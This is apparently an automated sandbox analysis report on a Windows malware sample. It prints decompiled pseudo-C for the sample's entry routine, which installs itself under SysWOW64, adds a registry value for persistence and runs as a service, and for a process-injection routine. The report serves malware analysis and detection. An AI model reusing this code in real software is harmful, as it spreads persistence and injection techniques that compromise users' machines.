Opcode ID: ddd792fbfdf9ee08b7e9a58457f760e6a6bb65683c1c3d32d39b4fa54cb81d85
Instruction ID: 4143f691a7d181fb54bb40f839c105231e38a6adcf9daca80d0b6986cb49b1e8
Opcode Fuzzy Hash: ddd792fbfdf9ee08b7e9a58457f760e6a6bb65683c1c3d32d39b4fa54cb81d85
Instruction Fuzzy Hash: FCB09231108A0F8ACA94BFA0F54A489B71CF950A083814520A6494A1296E6A6A508BAC

Uniqueness

Uniqueness Score: -1.00%

Function 032C0C52, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.825975538.00000000032C0000.00000040.00000001.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_32c0000_8EC4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: affb6538d3d4ca2c18e42a016d8c8a820b18217702420b16d381f260b924259b
Instruction ID: 68bec9858c1869c60bc4639ee86fdefd4336de8581abd694751742e2718ff148
Opcode Fuzzy Hash: affb6538d3d4ca2c18e42a016d8c8a820b18217702420b16d381f260b924259b
Instruction Fuzzy Hash: 33C092356090158FDF08CA68C2A476A7761EB86300B564298DA0A6FB5CCE3DAD12DBD2

Uniqueness

Uniqueness Score: -1.00%

Function 032C0C80, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.825975538.00000000032C0000.00000040.00000001.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_32c0000_8EC4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29afb589aa8c2600f6b0327772b20265e547ff9278ab8bcf7672b03e5705af34
Instruction ID: 1d1d69602e1bddd83e270d80be918c901a3a0114b3a3605446a2f9a7039d97ce
Opcode Fuzzy Hash: 29afb589aa8c2600f6b0327772b20265e547ff9278ab8bcf7672b03e5705af34
Instruction Fuzzy Hash: 0CB0123000C60F8BC6847BA0F54B445371CF540B0C3C14520A60D460296E78385087EC

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 032C9EE1, Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

Kl, xrefs: 032C9F32
Kl, xrefs: 032C9F75
Kl, xrefs: 032C9F81
Kl, xrefs: 032C9F3E

Memory Dump Source

Source File: 00000016.00000002.825975538.00000000032C0000.00000040.00000001.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_32c0000_8EC4.jbxd

Similarity

API ID:
String ID: Kl$Kl$Kl$Kl
API String ID: 0-3565144343
Opcode ID: 35b8cc1acf6ac3b2588c9e0d3baafa8114159e764405583f801749a9177e13d5
Instruction ID: ba8e5c63e727f38a83e56a7105eda0fbb0bfe6b2dfc0de6368741e0f8a0f040b
Opcode Fuzzy Hash: 35b8cc1acf6ac3b2588c9e0d3baafa8114159e764405583f801749a9177e13d5
Instruction Fuzzy Hash: E92101363152010F9B04EF3AA86062EB7D6AFD969431A40BEE60DCF7A0DF35DC458391

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: lagavljy.exe PID: 4544 Parent PID: 568 lagavljy.exeCOMMON

Executed Functions

Function 00409A6B, Relevance: 102.3, APIs: 48, Strings: 10, Instructions: 799
stringsleepregistryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			_entry_(CHAR* _a12, void* _a15) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				char _v28;
				char _v32;
				union _GET_FILEEX_INFO_LEVELS _v36;
				CHAR* _v40;
				char _v44;
				char _v48;
				struct _PROCESS_INFORMATION _v64;
				char _v80;
				char _v112;
				char _v371;
				char _v372;
				char _v671;
				char _v672;
				char _v704;
				struct _STARTUPINFOA _v772;
				char _v1271;
				char _v1272;
				char _v1672;
				char _t238;
				long _t239;
				char _t242;
				long _t244;
				CHAR* _t248;
				char _t250;
				intOrPtr _t257;
				char _t267;
				intOrPtr* _t272;
				char _t276;
				char _t279;
				char _t282;
				char _t283;
				void* _t284;
				char _t294;
				CHAR* _t303;
				int _t304;
				char _t309;
				CHAR* _t312;
				char _t318;
				int _t324;
				CHAR* _t325;
				char _t328;
				char* _t331;
				char _t332;
				char _t340;
				char _t344;
				CHAR* _t357;
				CHAR* _t358;
				int _t359;
				int _t373;
				long _t376;
				long _t379;
				void* _t383;
				void* _t396;
				void* _t401;
				char _t402;
				char _t403;
				intOrPtr* _t410;
				void* _t411;
				char _t417;
				char _t418;
				void* _t424;
				intOrPtr _t426;
				void* _t428;
				char* _t436;
				intOrPtr _t441;
				CHAR* _t442;
				void* _t450;
				void* _t451;
				char _t459;
				void* _t464;
				void* _t465;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t470;
				void* _t471;
				void* _t474;
				intOrPtr _t475;

				SetErrorMode(3); // executed
				SetErrorMode(3); // executed
				SetUnhandledExceptionFilter(E00406511); // executed
				E0040EC54(); // executed
				_t475 =  *0x41201f; // 0x0
				if(_t475 != 0) {
					__eflags =  *0x4133d8; // 0x43
					if(__eflags == 0) {
						L126:
						CreateThread(0, 0, E0040405E, 0, 0, 0);
						__imp__#115(0x1010,  &_v1672);
						E0040E52E(_t449, __eflags);
						E0040EAAF(1, 0);
						E00401D96(_t438, 0x412118);
						E004080C9(_t438);
						CreateThread(0, 0, E0040877E, 0, 0, 0);
						E00405E6C(__eflags);
						E00403132();
						E0040C125(__eflags);
						E00408DB1(_t438);
						Sleep(0xbb8);
						E0040C4EE();
						while(1) {
							__eflags =  *0x4133d0; // 0x0
							if(__eflags == 0) {
								goto L129;
							}
							_t239 = GetTickCount();
							__eflags = _t239 -  *0x4133d0 - 0x186a0;
							if(_t239 -  *0x4133d0 < 0x186a0) {
								L131:
								Sleep(0x2710);
								continue;
							}
							L129:
							_t238 = E0040C913();
							__eflags = _t238;
							if(_t238 == 0) {
								 *0x4133d0 = GetTickCount();
							}
							goto L131;
						}
					}
					_a12 = 0xa;
					while(1) {
						_t242 = DeleteFileA(0x4133d8);
						__eflags = _t242;
						if(_t242 != 0) {
							break;
						}
						__eflags = _a12;
						if(_a12 <= 0) {
							break;
						}
						_t244 = GetLastError();
						__eflags = _t244 - 2;
						if(_t244 == 2) {
							break;
						}
						_t219 =  &_a12;
						 *_t219 = _a12 - 1;
						__eflags =  *_t219;
						Sleep(0x3e8);
					}
					E0040EE2A(_t438, 0x4133d8, 0, 0x104);
					_t465 = _t465 + 0xc;
					goto L126;
				} else {
					_v12 = 0;
					if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) == 0) {
						_v672 = 0;
					}
					if(_v672 == 0x22) {
						E0040EF00( &_v672,  &_v671);
						_t436 = E0040ED23( &_v672, 0x22);
						_t465 = _t465 + 0x10;
						if(_t436 != 0) {
							 *_t436 = 0;
						}
					}
					_t248 = GetCommandLineA();
					_t459 = 0x4122f8;
					_a12 = _t248;
					_t250 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a48, 4, 0xe4, 0xc8));
					_t454 = 0x100;
					_v8 = _t250;
					E0040EE2A(_t438, 0x4122f8, 0, 0x100);
					_t467 = _t465 + 0x28;
					if(_v8 == 0) {
						_t257 = E004096AA( &_v672,  &_v48,  &_v44,  &_v372,  &_v112); // executed
						_t467 = _t467 + 0x14;
						_v16 = _t257;
						if(_t257 == 0) {
							E0040EF00("C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe",  &_v672);
							_pop(_t438);
							_a12 = GetCommandLineA();
							_v8 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a38, 4, 0xe4, 0xc8));
							E0040EE2A(_t438, 0x4122f8, 0, 0x100);
							_t468 = _t467 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								L102:
								_v8 = E0040EE95(_a12, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
								E0040EE2A(_t438, _t459, 0, _t454);
								_t467 = _t468 + 0x28;
								__eflags = _v8;
								if(_v8 == 0) {
									L110:
									_t267 = E00406EC3();
									__eflags = _t267;
									if(_t267 != 0) {
										E004098F2(_t438);
										L19:
										ExitProcess(0); // executed
									}
									__eflags = _v372;
									if(_v372 == 0) {
										L116:
										 *0x4133b0 = 0;
										L117:
										_v64.hProcess =  &_v372;
										_v64.hThread = E00409961;
										_v64.dwProcessId = 0;
										_v64.dwThreadId = 0;
										StartServiceCtrlDispatcherA( &_v64); // executed
										goto L19;
									}
									_t272 =  &_v372;
									_t449 = _t272 + 1;
									do {
										_t438 =  *_t272;
										_t272 = _t272 + 1;
										__eflags = _t438;
									} while (_t438 != 0);
									__eflags = _t272 - _t449 - 0x20;
									if(_t272 - _t449 >= 0x20) {
										goto L116;
									}
									E0040EF00("shayesoq",  &_v372);
									_pop(_t438);
									goto L117;
								}
								_t459 = _v8 + 3;
								_t276 = E0040ED03(_t459, 0x20);
								_pop(_t438);
								__eflags = _t276;
								if(_t276 != 0) {
									L107:
									_t454 = _t276 - _t459;
									__eflags = _t454 - 0x20;
									if(_t454 >= 0x20) {
										_t454 = 0x1f;
									}
									E0040EE08(0x412184, _t459, _t454);
									_t467 = _t467 + 0xc;
									 *((char*)(_t454 + 0x412184)) = 0;
									goto L110;
								}
								_t279 = _t459;
								_t449 = _t279 + 1;
								do {
									_t438 =  *_t279;
									_t279 = _t279 + 1;
									__eflags = _t438;
								} while (_t438 != 0);
								_t276 = _t279 - _t449 + _t459;
								__eflags = _t276;
								goto L107;
							}
							_t282 = _v8 + 3;
							_v672 = 0;
							__eflags =  *_t282 - 0x22;
							_v20 = _t282;
							if( *_t282 != 0x22) {
								_t283 = E0040ED03(_v20, 0x20);
								_pop(_t438);
								__eflags = _t283;
								if(_t283 == 0) {
									_t283 =  &(_a12[lstrlenA(_a12)]);
									__eflags = _t283;
								}
								_t284 = _t283 - _v8;
								_v24 = _t284;
								__eflags = _t284 + 0xfffffffd;
								E0040EE08( &_v672, _v20, _t284 + 0xfffffffd);
								 *((char*)(_t464 + _v24 - 0x29f)) = 0;
								L98:
								_t468 = _t468 + 0xc;
								L99:
								__eflags = _v672;
								if(_v672 != 0) {
									E0040EE08("C:\Users\jones\AppData\Local\Temp\86C4.exe",  &_v672, 0x103);
									_t468 = _t468 + 0xc;
								}
								 *0x412cc0 = 1;
								goto L102;
							}
							_v20 = _v8 + 4;
							_t294 = E0040ED03(_v8 + 4, 0x22);
							_pop(_t438);
							__eflags = _t294;
							if(_t294 == 0) {
								goto L99;
							}
							_v24 = _t294 - _v8;
							E0040EE08( &_v672, _v20, _t294 - _v8 + 0xfffffffc);
							 *((char*)(_t464 + _v24 - 0x2a0)) = 0;
							goto L98;
						}
						_v36 = 0;
						if(_t257 >= 4 || _v48 > 0x61 && _v44 != 0) {
							L84:
							if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) != 0) {
								_t303 =  &_v672;
								if(_v672 == 0x22) {
									_t303 =  &_v671;
								}
								if(_t303[1] == 0x3a && _t303[2] == 0x5c) {
									_t303[3] = 0;
									_t304 = GetDriveTypeA(_t303);
									_t515 = _t304 - 2;
									if(_t304 != 2) {
										E00409145(_t515);
										_t438 = 1;
									}
								}
							}
							goto L19;
						} else {
							E00404280(_t438, 1);
							_pop(_t438);
							if(_v672 == 0) {
								goto L84;
							}
							_t309 = E0040675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							_v8 = _t309;
							if(_t309 == 0 || _v12 == 0) {
								goto L84;
							} else {
								_v32 = 0;
								_v28 = 0;
								if(_v16 == 2) {
									L55:
									__eflags = _v16 - 3;
									if(_v16 >= 3) {
										L83:
										E0040EC2E(_v8);
										_pop(_t438);
										if(_v36 != 0) {
											goto L19;
										}
										goto L84;
									}
									_t312 = E00402544(_t459, 0x410a3c, 0xc, 0xe4, 0xc8);
									_t469 = _t467 + 0x14;
									__eflags = GetEnvironmentVariableA(_t312,  &_v1272, 0x1f4);
									if(__eflags == 0) {
										L82:
										E0040EE2A(_t438, _t459, 0, _t454);
										_t467 = _t469 + 0xc;
										goto L83;
									}
									_t318 = E004099D2(_t449, __eflags,  &_v1272,  &_v672,  &_v704, _v8, _v12);
									_t469 = _t469 + 0x14;
									__eflags = _t318;
									if(_t318 == 0) {
										goto L82;
									}
									E0040EE2A(_t438, _t459, 0, _t454);
									_t470 = _t469 + 0xc;
									_v1272 = 0x22;
									lstrcpyA( &_v1271,  &_v672);
									_t324 = lstrlenA( &_v1272);
									 *((char*)(_t464 + _t324 - 0x4f4)) = 0x22;
									_t325 = _t324 + 1;
									__eflags = _v16 - 2;
									_a12 = _t325;
									 *((char*)(_t464 + _t325 - 0x4f4)) = 0;
									if(_v16 != 2) {
										L60:
										_push(0);
										_push( &_v112);
										_t328 = E00406DC2(_t438) ^ 0x61616161;
										__eflags = _t328;
										_push(_t328);
										E0040F133();
										_t470 = _t470 + 0xc;
										L61:
										_t331 = E00402544(_t459,  &E004106AC, 0x2e, 0xe4, 0xc8);
										_t471 = _t470 + 0x14;
										_t332 = RegOpenKeyExA(0x80000001, _t331, 0, 0x103,  &_v24);
										_v20 = _t332;
										__eflags = _t332;
										if(_t332 == 0) {
											_t373 =  &(_a12[1]);
											__eflags = _t373;
											_t376 = RegSetValueExA(_v24,  &_v112, 0, 1,  &_v1272, _t373); // executed
											_v20 = _t376;
											RegCloseKey(_v24);
										}
										E0040EE2A(_t438, _t459, 0, _t454);
										E0040EE2A(_t438,  &_v772, 0, 0x44);
										_v772.cb = 0x44;
										E0040EE2A(_t438,  &_v64, 0, 0x10);
										_t469 = _t471 + 0x24;
										_t340 = GetModuleFileNameA(GetModuleHandleA(0),  &_v372, 0x104);
										__eflags = _t340;
										if(_t340 != 0) {
											__eflags = _v372 - 0x22;
											_t357 =  &_v372;
											_v40 = _t357;
											if(_v372 == 0x22) {
												_t357 =  &_v371;
												_v40 = _t357;
											}
											__eflags =  *((char*)(_t357 + 1)) - 0x3a;
											if( *((char*)(_t357 + 1)) == 0x3a) {
												__eflags =  *((char*)(_t357 + 2)) - 0x5c;
												if( *((char*)(_t357 + 2)) == 0x5c) {
													_t358 = _v40;
													_t438 = _t358[3];
													_a15 = _t358[3];
													_t358[3] = 0;
													_t359 = GetDriveTypeA(_t358);
													__eflags = _t359 - 2;
													if(_t359 != 2) {
														_t438 = _v40;
														_v40[3] = _a15;
														lstrcatA( &_v1272, E00402544(_t459, 0x410a38, 4, 0xe4, 0xc8));
														E0040EE2A(_v40, _t459, 0, _t454);
														_t469 = _t469 + 0x20;
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														lstrcatA( &_v1272,  &_v372);
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														_v36 = 1;
													}
												}
											}
										}
										__eflags = _v32;
										if(_v32 != 0) {
											__eflags = _v28;
											if(_v28 != 0) {
												wsprintfA( &_v372, "%X%08X", _v28, _v32);
												lstrcatA( &_v1272, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
												E0040EE2A(_t438, _t459, 0, _t454);
												_t469 = _t469 + 0x30;
												lstrcatA( &_v1272,  &_v372);
											}
										}
										_t344 = CreateProcessA(0,  &_v1272, 0, 0, 0, 0x8000000, 0, 0,  &_v772,  &_v64);
										__eflags = _t344;
										if(_t344 == 0) {
											DeleteFileA( &_v672);
											_v36 = 0;
										}
										__eflags = _v16 - 1;
										if(_v16 == 1) {
											__eflags = _v20;
											if(_v20 == 0) {
												E004096FF(_t438);
											}
										}
										goto L82;
									}
									__eflags = _v112;
									if(_v112 != 0) {
										goto L61;
									}
									goto L60;
								}
								_t379 = GetTempPathA(0x1f4,  &_v1272);
								_t494 = _t379;
								if(_t379 == 0) {
									goto L55;
								}
								_t383 = E004099D2(_t449, _t494,  &_v1272,  &_v672,  &_v704, _v8, _v12);
								_t467 = _t467 + 0x14;
								if(_t383 == 0) {
									goto L55;
								}
								_v80 = 0;
								if(_v16 < 3 || _v372 == 0) {
									_push(0);
									_push( &_v80);
									_push(E00406DC2(_t438) ^ 0x61616161);
									E0040F133();
									_t474 = _t467 + 0xc;
									lstrcpyA( &_v372, E00406CC9(_t438));
									lstrcatA( &_v372,  &_v80);
									lstrcatA( &_v372,  &E0041070C);
									_t396 = 0;
									__eflags = 0;
									goto L43;
								} else {
									_t410 =  &_v372;
									_t450 = _t410 + 1;
									do {
										_t441 =  *_t410;
										_t410 = _t410 + 1;
									} while (_t441 != 0);
									_t411 = _t410 - _t450;
									if(_t411 > 0 &&  *((char*)(_t464 + _t411 - 0x171)) == 0x5c) {
										_t411 = _t411 - 1;
									}
									_t451 = _t411;
									if(_t411 <= 0) {
										L41:
										_t449 = _t451 - _t411;
										_a12 = _t451 - _t411;
										E0040EE08( &_v80, _t464 + _t411 - 0x170, _t451 - _t411);
										 *((char*)(_t464 + _a12 - 0x4c)) = 0;
										_t474 = _t467 + 0xc;
										_t396 = 1;
										L43:
										if(_v44 == 0 || _v48 < 0x50) {
											_t438 = 1;
											__eflags = 1;
										} else {
											_t438 = 0;
										}
										_push(_t438);
										_push(_t396);
										_push( &_v372);
										_push( &_v80);
										_push( &_v672);
										_push( &_v704);
										_t401 = E00409326(_t438, _t449);
										_t467 = _t474 + 0x18;
										if(_t401 == 0) {
											_t402 =  *0x41217c; // 0x0
											_v32 = _t402;
											_t403 =  *0x412180; // 0x0
											goto L54;
										} else {
											if(GetFileAttributesExA( &_v672, 0,  &(_v772.dwXCountChars)) != 0) {
												_t403 = 0x61080108;
												 *0x412180 = 0x61080108;
												 *0x41217c = 0;
												_v32 = 0;
												L54:
												_v28 = _t403;
												DeleteFileA( &_v672);
												goto L55;
											}
											_t459 = 1;
											if(_v16 == 1) {
												E004096FF(_t438);
											}
											_v36 = _t459;
											goto L83;
										}
									} else {
										_t442 =  &_v372;
										while( *((char*)(_t442 + _t411 - 1)) != 0x5c) {
											_t411 = _t411 - 1;
											if(_t411 > 0) {
												continue;
											}
											goto L41;
										}
										goto L41;
									}
								}
							}
						}
					}
					_t417 = _v8;
					_t454 = _t417 + 3;
					_v372 = 0;
					if( *((char*)(_t417 + 3)) != 0x22) {
						_t418 = E0040ED03(_t454, 0x20);
						_pop(_t438);
						__eflags = _t418;
						if(_t418 == 0) {
							_t418 =  &(_a12[lstrlenA(_a12)]);
							__eflags = _t418;
						}
						_t459 = _t418 - _v8;
						__eflags = _t459;
						E0040EE08( &_v372, _t454, _t459 - 3);
						 *((char*)(_t464 + _t459 - 0x173)) = 0;
						L13:
						_t467 = _t467 + 0xc;
						L14:
						if(_v372 != 0 && _v672 != 0) {
							_t424 = E0040675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							if(_t424 != 0 && _v12 != 0) {
								_t426 = E00406A60(_t449,  &_v372, _t424, _v12);
								_t467 = _t467 + 0xc;
								_v12 = _t426;
							}
						}
						goto L19;
					}
					_t454 = _t417 + 4;
					_t428 = E0040ED03(_t417 + 4, 0x22);
					_pop(_t438);
					if(_t428 == 0) {
						goto L14;
					} else {
						_t459 = _t428 - _v8;
						E0040EE08( &_v372, _t454, _t459 - 4);
						 *((char*)(_t464 + _t459 - 0x174)) = 0;
						goto L13;
					}
				}
			}

APIs

SetErrorMode.KERNELBASE(00000003), ref: 00409A7F
SetErrorMode.KERNELBASE(00000003), ref: 00409A83
SetUnhandledExceptionFilter.KERNELBASE(00406511), ref: 00409A8A

Part of subcall function 0040EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
Part of subcall function 0040EC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
Part of subcall function 0040EC54: GetTickCount.KERNEL32 ref: 0040EC78

GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00409AB3
GetModuleFileNameA.KERNEL32(00000000), ref: 00409ABA
GetCommandLineA.KERNEL32 ref: 00409AFD
lstrlenA.KERNEL32(?), ref: 00409B99
ExitProcess.KERNEL32 ref: 00409C06
GetTempPathA.KERNEL32(000001F4,?), ref: 00409CAC
lstrcpyA.KERNEL32(?,00000000), ref: 00409D7A
lstrcatA.KERNEL32(?,?), ref: 00409D8B
lstrcatA.KERNEL32(?,0041070C), ref: 00409D9D
GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00409DED
DeleteFileA.KERNEL32(00000022), ref: 00409E38
GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00409E6F
lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409EC8
lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409ED5
RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00409F3B
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00409F5E
RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00409F6A
GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00409FAD
GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FB4
GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FFE
lstrcatA.KERNEL32(00000022,00000000), ref: 0040A038
lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A05E
lstrcatA.KERNEL32(00000022,00000022), ref: 0040A072
lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A08D
wsprintfA.USER32 ref: 0040A0B6
lstrcatA.KERNEL32(00000022,00000000), ref: 0040A0DE
lstrcatA.KERNEL32(00000022,?), ref: 0040A0FD
CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0040A120
DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0040A131
GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0040A174
GetModuleFileNameA.KERNEL32(00000000), ref: 0040A17B
GetDriveTypeA.KERNEL32(00000022), ref: 0040A1B6
GetCommandLineA.KERNEL32 ref: 0040A1E5

Part of subcall function 004099D2: lstrcpyA.KERNEL32(?,?,00000100,004122F8,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
Part of subcall function 004099D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
Part of subcall function 004099D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52

lstrlenA.KERNEL32(?), ref: 0040A288
StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040A3B7
GetLastError.KERNEL32 ref: 0040A3ED
Sleep.KERNEL32(000003E8), ref: 0040A400
DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\86C4.exe), ref: 0040A407
CreateThread.KERNEL32(00000000,00000000,0040405E,00000000,00000000,00000000), ref: 0040A42C
WSAStartup.WS2_32(00001010,?), ref: 0040A43A
CreateThread.KERNEL32(00000000,00000000,0040877E,00000000,00000000,00000000), ref: 0040A469
Sleep.KERNEL32(00000BB8), ref: 0040A48A
GetTickCount.KERNEL32 ref: 0040A49F
GetTickCount.KERNEL32 ref: 0040A4B7
Sleep.KERNEL32(00002710), ref: 0040A4C3

Strings

P, xrefs: 00409DAA
", xrefs: 0040A189
\, xrefs: 00409D0C
shayesoq, xrefs: 0040A389, 0040A397
C:\Users\user\AppData\Local\Temp\86C4.exe, xrefs: 0040A2CB, 0040A3CC, 0040A3E1, 0040A406, 0040A413
", xrefs: 0040A078
%X%08X, xrefs: 0040A0B0
D, xrefs: 00409F8E
C:\Windows\SysWOW64\shayesoq\lagavljy.exe, xrefs: 0040A1D9
", xrefs: 00409EDB

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
String ID: "$"$"$%X%08X$C:\Users\user\AppData\Local\Temp\86C4.exe$C:\Windows\SysWOW64\shayesoq\lagavljy.exe$D$P$\$shayesoq
API String ID: 2089075347-1761414663
Opcode ID: f4e5507119e69eedb4593e1dd0383ec50f8bffbbe603df83c793ad7a81fc6842
Instruction ID: 8eb9ea6afe9ee9197cc0e6cd2b03883a1bab6226c4cfd690aa98a93bf3167ae2
Opcode Fuzzy Hash: f4e5507119e69eedb4593e1dd0383ec50f8bffbbe603df83c793ad7a81fc6842
Instruction Fuzzy Hash: 275291B1D40259BBDB11DBA1CC49EEF7BBCAF04304F1444BBF509B6182D6788E948B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040637C, Relevance: 6.1, APIs: 4, Instructions: 67
memoryinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040637C(intOrPtr _a4, void* _a8, intOrPtr* _a12, void** _a16) {
				void* _v8;
				void* _t15;
				void* _t16;
				void* _t18;
				int _t20;
				long _t26;
				struct HINSTANCE__* _t32;
				void* _t37;

				if(_a8 != 0) {
					_t32 = GetModuleHandleA(0);
					_t26 =  *( *((intOrPtr*)(_t32 + 0x3c)) + _t32 + 0x50);
					_t15 = VirtualAlloc(0, _t26, 0x1000, 4); // executed
					_v8 = _t15;
					if(_t15 == 0) {
						L5:
						_t16 = 0;
					} else {
						E0040EE08(_t15, _t32, _t26);
						_t18 = VirtualAllocEx(_a8, 0, _t26, 0x1000, 0x40); // executed
						_t37 = _t18;
						if(_t37 == 0) {
							goto L5;
						} else {
							E004062B7(_v8, _t37);
							_t20 = WriteProcessMemory(_a8, _t37, _v8, _t26, 0); // executed
							if(_t20 != 0) {
								 *_a16 = _t37;
								 *_a12 = _t37 - _t32 + _a4;
								_t16 = 1;
							} else {
								goto L5;
							}
						}
					}
					return _t16;
				} else {
					return 0;
				}
			}

0x00406384
0x00406395
0x0040639a
0x004063a9
0x004063af
0x004063b4
0x004063f5
0x004063f5
0x004063b6
0x004063b9
0x004063ca
0x004063d0
0x004063d4
0x00000000
0x004063d6
0x004063da
0x004063eb
0x004063f3
0x004063fc
0x00406406
0x0040640a
0x00000000
0x00000000
0x00000000
0x004063f3
0x004063d4
0x0040640f
0x00406386
0x00406389
0x00406389

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,EntryPoint), ref: 0040638F
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,00409816,EntryPoint), ref: 004063A9
VirtualAllocEx.KERNELBASE(00000000,00000000,?,00001000,00000040), ref: 004063CA
WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000), ref: 004063EB

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: AllocVirtual$HandleMemoryModuleProcessWrite
String ID:
API String ID: 1965334864-0
Opcode ID: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
Instruction ID: 5c31eb3238d54f8d6ca6dd7d72ba58cabd3ec10295ac0618dae15ec7b9dc1832
Opcode Fuzzy Hash: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
Instruction Fuzzy Hash: B911A3B1600219BFEB119F65DC49F9B3FA8EB047A4F114035FD09E7290D775DC108AA8

Uniqueness

Uniqueness Score: -1.00%

Function 004073FF, Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 345
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E004073FF(void* __ecx, intOrPtr* _a4, signed int* _a8, int** _a12, char* _a16, char* _a20) {
				CHAR* _v8;
				void* _v12;
				int _v16;
				void* _v20;
				int* _v24;
				char* _v28;
				intOrPtr _v32;
				int _v36;
				char _v295;
				char _v296;
				char _v556;
				void _v592;
				intOrPtr* _t85;
				int** _t86;
				char* _t87;
				char* _t88;
				intOrPtr _t89;
				char* _t91;
				long _t92;
				signed int _t93;
				long _t97;
				signed int _t103;
				long _t107;
				char* _t118;
				intOrPtr* _t119;
				CHAR* _t123;
				void* _t125;
				char* _t127;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr _t137;
				signed int* _t146;
				int** _t147;
				void* _t160;
				signed int _t163;
				intOrPtr _t164;
				void* _t165;
				intOrPtr _t167;
				intOrPtr _t172;
				intOrPtr* _t173;
				void* _t186;
				intOrPtr _t187;
				int* _t188;
				void* _t190;
				void* _t191;
				char* _t192;
				signed int _t194;
				int* _t196;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t206;

				_t165 = __ecx;
				_t85 = _a8;
				_t188 = 0;
				_v16 = 0x104;
				if(_t85 != 0) {
					 *_t85 = 0;
				}
				_t86 = _a12;
				if(_t86 != _t188) {
					 *_t86 = _t188;
				}
				_t87 = _a16;
				if(_t87 != _t188) {
					 *_t87 = 0;
				}
				_t88 = _a20;
				if(_t88 != _t188) {
					 *_t88 = 0; // executed
